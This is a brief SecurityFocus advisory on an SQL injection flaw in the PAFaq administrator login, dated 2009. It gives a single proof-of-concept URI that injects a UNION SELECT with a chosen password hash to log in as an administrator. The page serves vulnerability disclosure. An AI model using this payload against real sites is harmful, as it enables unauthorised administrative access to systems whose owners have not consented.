Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

PAFaq Administrator Username SQL Injection Vulnerability

No exploit is required.

The following proof of concept URI is available:
http://www.example.com/pafaq/admin/index.php?act=login&username='%20UNION%20SELECT%20id,name,'3858f62230ac3c915f300c664312c63f',email,notify,permissions,session%20FROM%20pafaq_admins%20WHERE%201/*&password=foobar







 

Privacy Statement
Copyright 2009, SecurityFocus